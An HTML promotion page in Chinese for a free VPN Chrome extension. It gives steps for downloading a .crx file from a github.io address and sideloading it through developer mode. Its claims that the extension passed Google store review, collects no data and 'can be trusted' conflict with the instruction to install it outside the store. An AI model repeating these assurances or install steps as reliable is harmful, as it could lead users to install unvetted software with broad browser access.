<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title>fb</title>
<style type="text/css">
<!--
.STYLE11 {font-size: medium; color: #333333; }
.STYLE13 {color: #FF0000}
.STYLE14 {font-size: medium; color: #FF0000; }
.STYLE15 {
	font-size: 36px;
	font-weight: bold;
	color: #003366;
}
.STYLE16 {font-size: 24px}
.STYLE21 {color: #003399; font-size: 16px;}
.STYLE22 {font-size: 14px; }
.STYLE23 {color: #CC0000}
.STYLE24 {font-size: medium; color: #000000; }
.STYLE25 {color: #000033}
.STYLE26 {color: #FF0000; font-size: 14px; }
.STYLE29 {font-size: 12px; color: #FF0000;}
.STYLE30 {font-size: 12px}
body {
	background-color: #FFFFFF;
}
-->
</style>
</head>

<body>
<div align="center">
  <p>
	  <script type="text/javascript" src="./gx_files/f.txt"></script>
  <p></p>
  <table width="761" height="429" border="0">
    <tr>
      <th width="95" height="92" scope="col"><img src="48.png" width="48" height="48" align="top" /></th>
      <td width="650" scope="col"><div align="left" class="STYLE15">
        <h5 class="STYLE16">翻宝vpn</h5>
        <p class="STYLE22">%免费,</p>
      </div></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td><p class="STYLE21"></p>
        <p class="STYLE21">,下载安装就可以用的东西.是目前最方便简单的一下载地址</p>
        <p class="STYLE21">,<a href="https://fanbaovpn.github.io/7.0.crx" target="_blank">点击此处下载</a>下面说说</p>
        <p class="STYLE11">安装方法.打开谷歌浏览器菜单ミ里扩展程序页,点开<span class="STYLE13">开发者模式,刷新下</span>.</p>
        <p class="STYLE11">把下载的crx拖进去就行了,拖进去后<span class="STYLE23">点击浏览器右上角操作<strong>开启</strong>/</span><strong>关闭</strong>即可访问任何网站如谷歌学术youtub都不是问题,简单流畅.</p>
        <p class="STYLE14">注:这是才发布可以相信</p>
        <p align="right" class="STYLE14"><img src="啥事.png" width="123" height="44" /></p>
        <p align="left" class="STYLE14">安装后实例图:</p>
      <p class="STYLE14"><img src="dakai.PNG" width="660" height="316" /></p>
      <p class="STYLE13">自由上网</p>
      <p class="STYLE13">速度也很快如图:</p>      
      <p><img src="shudu.PNG" width="660" height="490" /></p>
      <p class="STYLE14">&nbsp;</p>
      <p class="STYLE14">恢复以前的网络点<strong>关闭</strong>就可以了!</p>
      <p class="STYLE14"><img src="huihu.PNG" alt="" width="660" height="293" /></p>
      <p class="STYLE14">&nbsp;</p>
      <p class="STYLE14">备注1:如果安装了你连操作界面都找不到,点拼图这个符号,点图钉固定,速度还行</p>
      <p class="STYLE14"><img src="bieshuo.PNG" width="660" height="438" /></p>
      <p class="STYLE24">如果上本土网站则不用开启,不然反而变慢~~~!!细节2:如果软件出故障了(故障率较低),开启将毫无意义啥都打不开,可以关闭后,点击开关下面地址是更新的地方!细节3,没有了 .<b/p>
      <p class="STYLE14">&nbsp;</p></td>
    </tr>
  </table>
  <p class="STYLE13">&nbsp;</p>
  <p class="STYLE26">&nbsp;</p>
</div>
<script type="text/javascript" src="https://js.users.51.la/21098507.js"></script>
<table width="1132" border="0">
  <tr>
    <th scope="col"><pre align="left">&nbsp;</pre>
    <pre align="left" class="STYLE30">Copyright?-2021关于-该扩展不会修改/收集/侵犯任何数据,谷歌商店过审可放心,如不喜欢删除即可/如何找到谷歌浏览器扩展页?可地址栏输入chrome://extensions/回车下/网站导航:<a href="https://scholar.google.com" target="_self" class="STYLE25">谷歌学术</a><a href="https://youtube.com" target="_blank">/youtube</a>网站</pre></th>
  </tr>
</table>
</body></html>
